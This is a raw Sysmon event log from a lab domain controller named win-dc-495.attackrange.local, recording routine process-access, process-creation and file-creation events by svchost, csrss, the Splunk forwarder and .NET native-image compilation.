13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:47.414{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9237-6005-1E04-00000000A301}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9237-6005-1E04-00000000A301}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.274{59A5CD1D-9237-6005-1E04-00000000A301}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:48.914{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9238-6005-2304-00000000A301}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.914{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9238-6005-2304-00000000A301}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:48.914{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9238-6005-2304-00000000A301}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.899{59A5CD1D-9238-6005-2204-00000000A301}47563792C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000008422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:48.820{59A5CD1D-9238-6005-2104-00000000A301}2188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\88c-0\System.Data.OracleClient.dll2021-01-18 13:50:48.820 10341000x80000000000000008421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9238-6005-2204-00000000A301}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
